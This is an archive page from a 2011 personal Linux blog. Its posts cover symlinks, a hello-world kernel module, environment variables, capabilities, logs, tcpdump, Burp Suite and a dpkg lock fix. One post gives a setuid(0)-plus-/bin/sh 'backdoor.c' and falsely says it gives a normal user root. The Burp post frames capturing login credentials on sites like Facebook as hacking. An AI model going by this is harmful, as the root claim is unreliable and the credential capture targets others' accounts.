PoiNtEr->: August 2011

                             Difference between a dream and an aim. A dream requires soundless sleep, whereas an aim requires sleepless efforts.

Search This Blog

Friday, August 19, 2011

GATE 2012 CS Full Study Material

Sunday, August 14, 2011

How to create soft link with ln command in linux

To make links between files you need to use ln command. A symbolic link (also known as a soft link or symlink) consists of a special type of file that serves as a reference to another file or directory. Unix/Linux like operating systems often uses symbolic links.
Two types of links

There are two types of links

    symbolic links: Refer to a symbolic path indicating the abstract location of another file
    hard links : Refer to the specific location of physical data.
                           


                            

How do I create soft link / symbolic link?

To create a symbolic link in Unix or Linux, at the shell prompt, enter the following command:
ln -s {target-filename} {symbolic-filename}

For example create softlink for /home/vishal/Desktop/syllabi.pdf as /home/vishal/study/syllabi1.pdf, enter the following command:
ln -s /home/vishal/Desktop/syllabi.pdf  /home/vishal/study/syllabi1.pdf
ls -l /home/vishal/Desktop/syllabi.pd
f


Output:

lrwxrwxrwx 1 vishal  vishal    16 2011-08-12 22:53 syllabi1.pdf -> /home/vishal/Desktop/syllabi.pdf

Saturday, August 13, 2011

My first linux kernel module ...Hello World!!


Hi guys.Today we are going to learn something about kernels.we will install a module in our linux operating system .Before doing that i request you to please google out difference between microkernel and monolithic kernel.My question is why we are interested in kernels ???
I think very obvious answer of this question is if you know every basic thing about your system and how it is implemented then you can screw it very easily..
SO now time for little warning if your love your laptop then think before trying this ,no their is no harm ...but the probability of going something wrong is much higher because you are dealing with the Heart {core} of system .



The module_init() macro defines which function is to be called at module insertion time (if the file is compiled as a module), or at boot time: if the file is not compiled as a module the module_init() macro becomes equivalent to __initcall(), which through linker magic ensures that the function is called on boot.
The function can return a negative error number to cause module loading to fail (unfortunately, this has no effect if the module is compiled into the kernel). For modules, this is called in user context, with interrupts enabled, and the kernel lock held, so it can sleep.

This module_exit() macro defines the function to be called at module removal time (or never, in the case of the file compiled into the kernel). It will only be called if the module usage count has reached zero. This function can also sleep, but cannot fail: everything must be cleaned up by the time it returns.


Code: hello_world.c


#include <linux/kernel.h>

#include <linux/module.h>

#include <linux/init.h>

#include <linux/version.h>

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("This is a my First Test Module...!");
MODULE_AUTHOR("Vishal Mishra");


static int __init my_start_init(void){

        printk(KERN_INFO "Hello World module loaded...!\n");
        return 0;
}

static void __exit my_remove_exit(void){

        printk(KERN_INFO "Hello World module Un-loaded...!\n"); 

}

module_init(my_start_init);
module_exit(my_remove_exit);






Makefile:


obj-m   :=      hello_world.o

all:
        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules

clear:    

        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean



Now save above code as Makefile in same folder in which hello_world.c is present.




Now you can run following commands to get information about your newly installed module

1:modinfo hello_world.ko
2:lsmod  {this command will list all installed modules in your kernel and you can check whether hello_world is their or not }

For more on linux kernel module programming check out my new post which will explain each function  used above in detail here














Reference:
Tutorials - OSDev Wiki
 http://linuxpoison.blogspot.com/2008/01/want-to-write-linux-kernel.html
 http://linuxkernel51.blogspot.com/2011/03/lodable-kernel-module.html
http://tldp.org/LDP/lkmpg/2.6/html/index.html

Thursday, August 11, 2011

Printing the Execution Environment in C language

Enumerating all the variables in the environment is a little trickier.To do this, you
must access a special global variable named environ, which is defined in the GNU C
library.This variable, of type char**, is a NULL-terminated array of pointers to character
strings. Each string contains one environment variable, in the form VARIABLE=value.


#include<stdio.h>
extern char** environ;
int main()
{
char** var;
for(var = environ; *var !=NULL; ++var)
printf("%s\n",*var);
return 0;
}


output:            




Now you know each and every environment variable value ,you can use them to hack into system...try it !

Wednesday, August 10, 2011

How to Give normal user superuser privilege?..Linux Hack


#include<unistd.h>
#include<fcntl.h>                                              
main()
{
setuid(0);
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
return 0;
}


save this file as backdoor.c and compile it then use its output file to get superuser privilege ..
thats it now run the output file from normal user account..
Vishal@Eva$./b      (suppose the name of output file is b)
$
now check your uid
$ id -u


0
Output "0" confirms that you have superuser privilege now .

Tuesday, August 9, 2011

How to Remove Linux kernel capabilities and make root handicap??

As you may know, Linux has capabilities. Maybe you don’t need all capabilities, if this is your case, you are in luck, since you can remove it using the lcap tool.
To list all Linux capabilities:
~# lcap
Current capabilities: 0xFFFDFCFF
   0) *CAP_CHOWN                     1) *CAP_DAC_OVERRIDE
   2) *CAP_DAC_READ_SEARCH           3) *CAP_FOWNER
   4) *CAP_FSETID                    5) *CAP_KILL
   6) *CAP_SETGID                    7) *CAP_SETUID
   8) *CAP_SETPCAP                   9) *CAP_LINUX_IMMUTABLE
  10) *CAP_NET_BIND_SERVICE         11) *CAP_NET_BROADCAST
  12) *CAP_NET_ADMIN                13) *CAP_NET_RAW
  14) *CAP_IPC_LOCK                 15) *CAP_IPC_OWNER
  16) *CAP_SYS_MODULE               17)  CAP_SYS_RAWIO
  18) *CAP_SYS_CHROOT               19) *CAP_SYS_PTRACE
  20) *CAP_SYS_PACCT                21) *CAP_SYS_ADMIN
  22) *CAP_SYS_BOOT                 23) *CAP_SYS_NICE
  24) *CAP_SYS_RESOURCE             25) *CAP_SYS_TIME
  26) *CAP_SYS_TTY_CONFIG           27) *CAP_MKNOD
  28) *CAP_LEASE                    29) *CAP_AUDIT_WRITE
  30) *CAP_AUDIT_CONTROL
    * = Capabilities currently allowed
 
 
                                
 
 
For example, I want to disable CAP_CHOWN, so I don’t want that any user (including root) has the possibility to change the file owner. So, in this case, the file is UNCHOWNABLE.
Usual way:
# touch filename
# chown vishal filename
Now the file is owned by vishal
My preferred way:
First, we remove CHOWN capability
(as root)
# lcap CAP_CHOWN
# touch filename
# chown vishal filename
chown: changing ownership of `filename’: Operation not permitted
As you can see, chown does not work as expected, since we have removed that capability. To restore it, you need to reboot.
You can disable any capability at your own risk ;)
This tool is interesting  with a few changes/updates and you are up with increase security, for example, to remove the possibility to load/unload a module use CAP_SYS_MODULE,  it helps a bit for rootkits,  for files that you don’t want to be modified in anyway, you can use CAP_LINUX_IMMUTABLE on /bin, /usr/bin, /sbin, /usr/sbin to have expected binaries (checksums). Try to play with any capabilitiy and see if is interesting for you.
For further info: man lcap
or click here


Ubuntu(Linux) Log files and usage

 

 Its really important some times to check log files whether you are working on your home system or on server etc.So lets see how we can do that in ubuntu (linux).Well this will work for most of linux distributions.First thing we must know is which log file contain what and where it is located on our system so that we can access it according to our need...

=> /var/log/messages or /var/log/syslog : General log messages
=> /var/log/boot : System boot log
=> /var/log/debug : Debugging log messages
=> /var/log/auth.log : User login and authentication logs
=> /var/log/daemon.log : Running services such as squid, ntpd and others log message to this file
=> /var/log/dmesg : Linux kernel ring buffer log
=> /var/log/dpkg.log : All binary package log includes package installation and other information
=> /var/log/faillog : User failed login log file
=> /var/log/kern.log : Kernel log file
=> /var/log/lpr.log : Printer log file
=> /var/log/mail.* : All mail server message log files
=> /var/log/mysql.* : MySQL server log file
=> /var/log/user.log : All userlevel logs
=> /var/log/xorg.0.log : X.org log file
=> /var/log/apache2/* : Apache web server log files directory
=> /var/log/lighttpd/* : Lighttpd web server log files directory
=> /var/log/fsck/* : fsck command log
=> /var/log/apport.log : Application crash report / log file




View log files using GUI tools using the GNOME System Log Viewer

System Log Viewer is a graphical, menu-driven viewer that you can use to view and monitor your system logs. System Log Viewer comes with a few functions that can help you manage your logs, including a calendar, log monitor and log statistics display. System Log Viewer is useful if you are new to system administration because it provides an easier, more user-friendly display of your logs than a text display of the log file. It is also useful for more experienced administrators, as it contains a calendar to help you locate trends and track problems, as well as a monitor to enable you to continuously monitor crucial logs.
You can start System Log Viewer in the following ways:
Click on System menu > Choose Administration > Log file viewer:




(The GNOME System Log Viewer)
Note you can start the GNOME System Log Viewer from a shell prompt, by entering the following command:
$ gnome-system-log &

Monday, August 8, 2011

what does Ubuntu means???

Ubuntu is a South African ethical ideology focusing on people's allegiances and relations with each other. The word comes from the Zulu and Xhosa languages. Ubuntu is seen as a traditional African concept, is regarded as one of the founding principles of the new republic of South Africa and is connected to the idea of an African Renaissance.

A rough translation of the principle of Ubuntu is "humanity towards others". Another translation could be: "The belief in a universal bond of sharing that connects all humanity".


                                                             


"A person with ubuntu is open and available to others, affirming of others, does not feel threatened that others are able and good, for he or she has a proper self-assurance that comes from knowing that he or she belongs in a greater whole and is diminished when others are humiliated or diminished, when others are tortured or oppressed."
 -- Archbishop Desmond Tutu

As a platform based on Free software, the Ubuntu operating system brings the spirit of ubuntu to the software world.

The Ubuntu project is entirely committed to the principles of free software development; people are encouraged to use free software, improve it,and pass it on.

"Free software" doesn't mean that you shouldn't have to pay for it (although Ubuntu is committed to being free of charge as well). It means that you should be able to use the software in any way you wish: the code that makes up free software is available for anyone to download, change, fix, and use in any way. Alongside ideological benefits, this freedom also has technical advantages: when programs are developed, the hard work of others can be used and built upon. With non-free software, this cannot happen and when programs are developed, they have to start from scratch. For this reason the development of free software is fast, efficient and exciting!

what is akamai technologies?

 

 

While tracing my network i came across this akamaitechnologies,i am getting constantly packets from this website server and then finally i googled it and came to known about this company.

 

The company was founded in 1998 by then-MIT graduate student Daniel M. Lewin, and MIT Applied Mathematics professor Tom Leighton.

Akamai transparently mirrors content—sometimes all site content including HTML, CSS, and software downloads, and sometimes just media objects such as audio, graphics, animation, and video—from customer servers. Though the domain name (but not subdomain) is the same, the IP address points to an Akamai server rather than the customer's server. The Akamai server is automatically picked depending on the type of content and the user's network location.

The benefit is that users can receive content from whichever Akamai server is close to them or has a good connection, leading to faster download times and less vulnerability to network congestion or outages.

In addition to content caching, Akamai provides services which accelerate dynamic and personalized content, J2EE-compliant applications, and streaming media to the extent that such services frame a localized perspective

 

751px-Akamaiprocess

 

 

In the diagram shown, we see an "Akamaized" website; this simply means that certain content within the website (usually media objects such as audio, graphics, animation, video) will not point to servers owned by the original website, in this case ACME, but to servers owned by Akamai. It is important to note that even though the domain name is the same, namely www.acme.com and image.acme.com, the ip address (server) that image.acme.com points to is actually owned by Akamai and not ACME.

Step 1. The client's browser requests the default web page at the ACME site. The site returns the web page index.html.

Step 2. If the html code is examined you can see that there is a link to an image hosted on the Akamai owned server image.acme.com.

Step 3. As your web browser parses the html code it pulls the image object bigpicture.jpg from image.acme.com

Using tcpdump and wireshark to capture packets on a Linux system


The following command will capture all packets on the eth0 network interface and log them to a file called packets.tcpdump.
tcpdump -i eth0 -s 0 -U -w packets.tcpdump
tcpdump will continue to run in the foreground while you generate the network activity.  When you're done, press CTRL+C to stop tcpdump.  Note that running tcpdump in this manner could have an adverse effect on network performance, so you should not leave this running in a production environment.
Capturing all packets also has a potential to use a lot of disk space if your network is busy.  If you're having trouble finding the traffic you want because the dump is too large, consider passing additional arguments to tcpdump to filter the types of packets that are captured, e.g., only packets from a certain IP address or only packets on a certain port.
The following command will only capture TCP packets destined for or originating from port 80.
tcpdump -i eth0 -s 0 -U -w port-80-packets.tcpdump tcp port 80
Of course, the downside to filtering the dump at capture-time is that you may miss something that helps you debug the problem you're encountering.  If you can afford the disk space and your network is not that busy, it may be better to capture all packets and just use a view filter in Wireshark to help you find what you're looking for.

To install wireshark in ubuntu use following command:

sudo apt-get install wireshark

to open wireshark press alt+f2

and give following code in run section:

gksudo wireshark

Screenshot-3

wireshark is best utility to capture packets i had ever came across ,  i recommend it for every linux noob.

how to use burp suite?

What is the Burp Suite?
Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
Source: http://www.portswigger.net/suite/
The Burp Suite is made up of tools (descriptions take from the Port Swigger website):
Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.
Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.
Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.
Intruder: Burp Intruder is a tool for automating customised attacks against web applications.
Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.
Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.
Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.
Enabling the Burp Suite Proxy
To begin using the Burp Suite to test our example web application we need configure our web browser to use the Burp Suite as a proxy. The Burp Suite proxy will use port 8080 by default but you can change this if you want to.
You can see in the image below that I have configured Firefox to use the Burp Suite proxy for all traffic
FF-PRoxy
When you open the Burp Suite proxy tool you can check that the proxy is running by clicking on the options tab
Burp13-560x446

You can see that the proxy is using the default port:
Burp2-560x446

The proxy is now running and ready to use. You can see that the proxy options tab has quite a few items that we can configure to meet our testing needs
Now the main phase we login to a facebook,orkut,myspace or any other website’s account and try to get username and password using burp..lets see how i do it …let the Hacking begin::{its only for study purpose dont misuse it}

To do this we must ensure that the Burp Suite proxy is configured to intercept our requests:
Burp7-560x446

With the intercept enabled we will submit the logon form and send it to the intruder as you can see below:
Burp8-560x446
Burp9-560x446
The Burp Suite will send our request to the intruder tool so we can begin our testing. You can see the request in the intruder tool below:
Burp10-560x446
The tool has automatically created payload positions for us. The payload positions are defined using the § character, the intruder will replace the value between two § characters with one of our test inputs.
The positions tab which is shown in the image above has four different attack types for you to choose from (definitions taken from http://www.portswigger.net/intruder/help.html) :

Saturday, August 6, 2011

Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) in ubuntu ???

Checked for "is another process using it?":
Code:

ps aux  | egrep -i 'apt|ftp|kpack|dpkg'  | less

I killed them all anyway, just to be sure:
Code:

killall -9 apt* kpackage dpkg


If you ever use synaptic (it's removed from my system), you should make that:
Code:

killall -9 apt* kpackage dpkg synaptic


Having confirmed that there were no "rogue" pkg. managers running, I checked, removed, & rechecked the lock file:
Code:

ls -l /var/lib/dpkg/lock
rm -f /var/lib/dpkg/lock
ls -l /var/lib/dpkg/lock